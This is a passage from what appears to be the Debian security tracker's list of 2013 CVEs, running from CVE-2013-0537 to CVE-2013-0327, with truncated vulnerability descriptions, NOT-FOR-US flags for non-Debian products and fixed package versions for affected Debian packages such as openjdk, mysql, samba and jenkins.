Lotus Notes CVE-2013-0537 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-0536 (ntmulti.exe in the Multi User Profile Cleanup service in IBM Notes 8.0 ...) NOT-FOR-US: IBM Notes CVE-2013-0535 (Multiple cross-site scripting (XSS) vulnerabilities in the Classic Mee ...) NOT-FOR-US: IBM Sametime CVE-2013-0534 (The Connect client in IBM Sametime 8.5.1, 8.5.1.1, 8.5.1.2, 8.5.2, and ...) NOT-FOR-US: IBM Sametime CVE-2013-0533 (Cross-site scripting (XSS) vulnerability in the Sametime Links server ...) NOT-FOR-US: IBM Sametime CVE-2013-0532 (Cross-site request forgery (CSRF) vulnerability in IBM Security AppSca ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0531 (The SSL implementation in IBM Security AppScan Enterprise before 8.7.0 ...) NOT-FOR-US: IBM CVE-2013-0530 RESERVED CVE-2013-0529 (The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 ...) NOT-FOR-US: IBM Sterling Connect:Direct CVE-2013-0528 REJECTED CVE-2013-0527 (The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 ...) NOT-FOR-US: IBM Sterling Connect:Direct CVE-2013-0526 (ping.php in Global Console Manager 16 (GCM16) and Global Console Manag ...) NOT-FOR-US: IBM GCM16 CVE-2013-0525 (Multiple cross-site scripting (XSS) vulnerabilities in IBM iNotes 8.5. ...) NOT-FOR-US: IBM Domino CVE-2013-0524 RESERVED CVE-2013-0523 (IBM WebSphere Commerce Enterprise 5.6.x through 5.6.1.5, 6.0.x through ...) NOT-FOR-US: IBM WebSphere CVE-2013-0522 (The Notes Client Single Logon feature in IBM Notes 8.0, 8.0.1, 8.0.2, ...) NOT-FOR-US: IBM CVE-2013-0521 RESERVED CVE-2013-0520 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...) NOT-FOR-US: IBM CVE-2013-0519 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...) NOT-FOR-US: IBM CVE-2013-0518 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...) NOT-FOR-US: IBM CVE-2013-0517 (A Command Execution Vulnerability exists in IBM Sterling External Auth ...) NOT-FOR-US: IBM CVE-2013-0516 REJECTED CVE-2013-0515 RESERVED CVE-2013-0514 RESERVED CVE-2013-0513 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rationa ...) NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester CVE-2013-0512 (Stack-based buffer overflow in the Manual Explore browser plug-in for ...) NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester CVE-2013-0511 (Multiple SQL injection vulnerabilities in IBM Security AppScan Enterpr ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0510 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 includes a secu ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0509 (Buffer overflow in the Transaction MIB agent in IBM Tivoli Netcool Sys ...) NOT-FOR-US: IBM CVE-2013-0508 (Multiple buffer overflows in IBM Tivoli Netcool System Service Monitor ...) NOT-FOR-US: IBM CVE-2013-0507 (IBM InfoSphere Information Server 8.1, 8.5, 8.7, 9.1 has a Session Fix ...) NOT-FOR-US: IBM CVE-2013-0506 (Cross-site scripting (XSS) vulnerability in IBM Sterling Order Managem ...) NOT-FOR-US: IBM Sterling Order Management CVE-2013-0505 (IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 b ...) NOT-FOR-US: IBM Sterling Order Management CVE-2013-0504 (Buffer overflow in the broker service in Adobe Flash Player before 10. ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-0503 (Cross-site scripting (XSS) vulnerability in the Bookmarks component in ...) NOT-FOR-US: IBM Lotus Connections CVE-2013-0502 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-0501 (The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edra ...) NOT-FOR-US: IBM Cognos Disclosure Management CVE-2013-0500 (IBM Storwize V7000 Unified 1.3.x and 1.4.x before 1.4.2.0 does not pro ...) NOT-FOR-US: IBM Storwize V7000 Unified CVE-2013-0499 (Cross-site scripting (XSS) vulnerability in the echo functionality on ...) NOT-FOR-US: IBM CVE-2013-0498 RESERVED CVE-2013-0497 RESERVED CVE-2013-0496 RESERVED CVE-2013-0495 RESERVED CVE-2013-0494 (IBM Sterling B2B Integrator 5.0 and 5.1 allows remote attackers to cau ...) NOT-FOR-US: IBM Sterling Integrator CVE-2013-0493 RESERVED CVE-2013-0492 (Cross-site scripting (XSS) vulnerability in IBM Informix Open Admin To ...) NOT-FOR-US: IBM Informix CVE-2013-0491 RESERVED CVE-2013-0490 (Unspecified vulnerability in IBM InfoSphere Guardium S-TAP 8.1 for DB2 ...) NOT-FOR-US: IBM InfoSphere Guardium CVE-2013-0489 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka t ...) NOT-FOR-US: IBM Domino CVE-2013-0488 (Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web ...) NOT-FOR-US: IBM Domino CVE-2013-0487 (The Java Console in IBM Domino 8.5.x allows remote authenticated users ...) NOT-FOR-US: IBM Domino CVE-2013-0486 (Memory leak in the HTTP server in IBM Domino 8.5.x allows remote attac ...) NOT-FOR-US: IBM Domino CVE-2013-0485 (Unspecified vulnerability in IBM Java SDK 7 before SR4-FP1, 6 before S ...) NOT-FOR-US: IBM Java SDK CVE-2013-0484 (The server process in IBM Cognos TM1 10.1.x before 10.1.1 FP1 allows r ...) NOT-FOR-US: IBM Cognos TM1 CVE-2013-0483 (The login component in SOAP Gateway in IBM IMS Enterprise Suite 1.1, 2 ...) NOT-FOR-US: IBM IMS Enterprise Suite CVE-2013-0482 (IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.29, 8.0 before ...) NOT-FOR-US: IBM CVE-2013-0481 (The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling Fi ...) NOT-FOR-US: IBM CVE-2013-0480 RESERVED CVE-2013-0479 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0478 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...) NOT-FOR-US: IBM CVE-2013-0477 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...) NOT-FOR-US: IBM CVE-2013-0476 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0475 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0474 (The Manual Explore browser plug-in in IBM Security AppScan Enterprise ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0473 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Security Ap ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-0472 (The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 befo ...) NOT-FOR-US: IBM CVE-2013-0471 (The traditional scheduler in the client in IBM Tivoli Storage Manager ...) NOT-FOR-US: IBM CVE-2013-0470 (HTTPD in IBM Netezza Performance Portal 1.0.2 allows remote authentica ...) NOT-FOR-US: IBM CVE-2013-0469 RESERVED CVE-2013-0468 (Cross-site scripting (XSS) vulnerability in IBM Sterling B2B Integrato ...) NOT-FOR-US: IBM CVE-2013-0467 (IBM Eclipse Help System (IEHS), as used in IBM Data Studio 3.1 and 3.1 ...) NOT-FOR-US: IBM CVE-2013-0466 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Message Brok ...) NOT-FOR-US: IBM CVE-2013-0465 (Unspecified vulnerability in the IBM WebSphere Cast Iron physical and ...) NOT-FOR-US: IBM CVE-2013-0464 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Eclipse Hel ...) NOT-FOR-US: IBM CVE-2013-0463 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0462 (Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6. ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0461 (Cross-site scripting (XSS) vulnerability in the virtual member manager ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0460 (Cross-site request forgery (CSRF) vulnerability in the portlet subsyst ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0459 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0458 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-0457 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM CVE-2013-0456 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-0455 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...) NOT-FOR-US: IBM CVE-2013-0454 (The SMB2 implementation in Samba 3.6.x before 3.6.6, as used on the IB ...) - samba 2:3.6.6-1 [squeeze] - samba (only Samba 3.6.0 - 3.6.5 (inclusive) affected) NOTE: https://www.samba.org/samba/security/CVE-2013-0454 CVE-2013-0453 (Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli Endpoint Manager CVE-2013-0452 (Cross-site request forgery (CSRF) vulnerability in the Software Use An ...) NOT-FOR-US: IBM Tivoli Endpoint Manager CVE-2013-0451 (SQL injection vulnerability in IBM Maximo Asset Management 6.2 through ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-0450 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0449 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0448 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java7) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-0447 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0446 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0445 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12.1-1 - openjdk-7 7u17-2.3.8-1 NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69 NOTE: openjdk-7 fixed in experimental: 7u13-2.3.6-1 CVE-2013-0444 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java7) - openjdk-7 7u3-2.1.6-1 NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/ce04db4aba39 CVE-2013-0443 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0442 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69 CVE-2013-0441 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0440 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0439 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0438 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0437 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java7) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0436 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0435 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0434 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0433 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0432 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0431 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java7) - openjdk-7 7u3-2.1.6-1 NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/b09c28ff798f CVE-2013-0430 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0429 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0428 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0427 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0426 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0425 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0424 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-0423 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0422 (Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remot ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u3-2.1.4-1 NOTE: Exploitable on Linux https://www.openwall.com/lists/oss-security/2013/01/11/1 CVE-2013-0421 REJECTED CVE-2013-0420 (Unspecified vulnerability in the VirtualBox component in Oracle Virtua ...) - virtualbox 4.1.18-dfsg-2 (bug #698292) - virtualbox-ose (Vulnerable code not present) CVE-2013-0419 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0418 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Outside In CVE-2013-0417 (Unspecified vulnerability in the Sun Storage Common Array Manager (CAM ...) NOT-FOR-US: Sun Storage Common Array Manager CVE-2013-0416 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...) NOT-FOR-US: Oracle Siebel CVE-2013-0415 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0414 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0413 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-0412 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...) NOT-FOR-US: Solaris CVE-2013-0411 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows lo ...) NOT-FOR-US: Solaris CVE-2013-0410 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...) NOT-FOR-US: Oracle Supply Chain CVE-2013-0409 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-0408 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0407 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-0406 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attac ...) NOT-FOR-US: Solaris CVE-2013-0405 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...) NOT-FOR-US: Solaris CVE-2013-0404 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Solaris CVE-2013-0403 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...) NOT-FOR-US: Solaris CVE-2013-0402 (Heap-based buffer overflow in the Java Runtime Environment (JRE) compo ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-0401 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-0400 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...) NOT-FOR-US: Solaris CVE-2013-0399 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...) NOT-FOR-US: Solaris CVE-2013-0398 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows re ...) NOT-FOR-US: Oracle Solaris CVE-2013-0397 (Unspecified vulnerability in the Oracle Applications Framework compone ...) NOT-FOR-US: Oracle Applications Framework CVE-2013-0396 (Unspecified vulnerability in the Application Performance Management (A ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0395 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0394 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle P ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0393 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Outside In CVE-2013-0392 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0391 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0390 (Unspecified vulnerability in the Oracle Applications Framework compone ...) NOT-FOR-US: Oracle Applications Framework CVE-2013-0389 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...) {DSA-2780-1} - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0388 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle P ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0387 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0386 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0385 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...) {DSA-2780-1} - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0384 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...) {DSA-2780-1} - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0383 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...) {DSA-2780-1} - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0382 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0381 (Unspecified vulnerability in the Oracle CRM Technical Foundation compo ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0380 (Unspecified vulnerability in the Oracle Payroll component in Oracle E- ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0379 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0378 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0377 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0376 (Unspecified vulnerability in the Oracle Applications Framework compone ...) NOT-FOR-US: Oracle E Business suite CVE-2013-0375 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...) {DSA-2780-1} - mysql-5.1 5.1.67 - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0374 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0373 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0372 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-0371 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0370 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain product suite CVE-2013-0369 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0368 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0367 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2013-0366 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0365 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-0364 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0363 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0362 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0361 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...) NOT-FOR-US: Oracle Database Mobile/Lite Server CVE-2013-0360 (Unspecified vulnerability in the Application Performance Management (A ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0359 (Unspecified vulnerability in the APM - Application Performance Managem ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0358 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0357 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0356 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...) NOT-FOR-US: Oracle PeopleSoft CVE-2013-0355 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0354 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0353 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0352 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-0351 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-0350 (tmp_smtp.c in pktstat 1.8.5 allows local users to overwrite arbitrary ...) - pktstat 1.8.5-3 (bug #701211) [squeeze] - pktstat (Vulnerable code not present) CVE-2013-0349 (The hidp_setup_hid function in net/bluetooth/hidp/core.c in the Linux ...) {DSA-2668-1} - linux 3.2.39-1 - linux-2.6 CVE-2013-0348 (thttpd.c in sthttpd before 2.26.4-r2 and thttpd 2.25b use world-readab ...) - thttpd (low) [squeeze] - thttpd (Minor issue) NOTE: http://blogs.gentoo.org/blueness/2014/10/03/sthttpd-a-very-tiny-and-very-fast-http-server-with-a-mature-codebase/ CVE-2013-0347 (The Gentoo init script for webfs uses world-readable permissions for / ...) - webfs 1.21+ds1-9 (low; bug #701638) [wheezy] - webfs (Minor issue) [squeeze] - webfs (Minor issue) CVE-2013-0346 (** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for t ...) - tomcat6 (Log files are owned by tomcat:tomcat) CVE-2013-0345 (varnish 3.0.3 uses world-readable permissions for the /var/log/varnish ...) - varnish (Logfiles are owned by varnishlog:varnishlog) CVE-2013-0344 RESERVED CVE-2013-0343 (The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux ...) {DSA-2906-1} - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (low) CVE-2013-0342 (The CreateID function in packet.py in pyrad before 2.1 uses sequential ...) - pyrad (low; bug #701151) [bullseye] - pyrad (Minor issue) [buster] - pyrad (Minor issue) [stretch] - pyrad (Minor issue) [jessie] - pyrad (Minor issue) [wheezy] - pyrad (Minor issue) [squeeze] - pyrad (Minor issue) NOTE: this is initially related to #700669 CVE-2013-0341 [external entity expansion] REJECTED CVE-2013-0340 (expat 2.1.0 and earlier does not properly handle entities expansion un ...) - expat (unimportant) NOTE: Expat provides API to mitigate expansion attacks, ultimately under control of the app using Expat NOTE: https://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-0340.html CVE-2013-0339 (libxml2 through 2.9.1 does not properly handle external entities expan ...) {DSA-2652-1} - libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260) CVE-2013-0338 (libxml2 2.9.0 and earlier allows context-dependent attackers to cause ...) {DSA-2652-1} - libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260) CVE-2013-0337 (The default configuration of nginx, possibly 1.3.13 and earlier, uses ...) - nginx (low; bug #701112) [bullseye] - nginx (Minor issue) [buster] - nginx (Minor issue) [stretch] - nginx (Minor issue) [jessie] - nginx (Minor issue) [wheezy] - nginx (Minor issue) [squeeze] - nginx (Minor issue) NOTE: Can only be fixed properly once https://trac.nginx.org/nginx/ticket/376 is resolved upstream NOTE: Originally fixed in 1.4.4-2 but reintroduced with DSA-3701-1 (CVE-2016-1247) NOTE: Post DSA-3701-1, Debian's default configuration is not affected, new log files are CVE-2013-0336 (The ipapwd_chpwop function in daemons/ipa-slapi-plugins/ipa-pwd-extop/ ...) - 389-ds-base 1.3.2.9-1 (bug #704077) CVE-2013-0335 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...) - nova 2012.1.1-14 (bug #701773) CVE-2013-0334 (Bundler before 1.7, when multiple top-level source lines are used, all ...) - bundler 1.7.2-1 (low; bug #762739) [wheezy] - bundler (Minor issue) CVE-2013-0333 (lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before ...) {DSA-2613-1} - rails 2.3.14.1 (bug #699226) - ruby-activesupport-2.3 2.3.14-6 (bug #699249) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo CVE-2013-0332 (Multiple directory traversal vulnerabilities in ZoneMinder 1.24.x befo ...) {DSA-2640-1} - zoneminder 1.25.0-1 (bug #700912) CVE-2013-0331 (Jenkins before 1.502 and LTS before 1.480.3 allows remote authenticate ...) - jenkins 1.480.3+dfsg-1 (bug #700761) CVE-2013-0330 (Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480 ...) - jenkins 1.480.3+dfsg-1 (bug #700761) CVE-2013-0329 (Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480 ...) - jenkins 1.480.3+dfsg-1 (bug #700761) CVE-2013-0328 (Cross-site scripting (XSS) vulnerability in Jenkins before 1.502 and L ...) - jenkins 1.480.3+dfsg-1 (bug #700761) CVE-2013-0327 (Cross-site request forgery (CSRF) vulnerability in Jenkins master in J ...) - 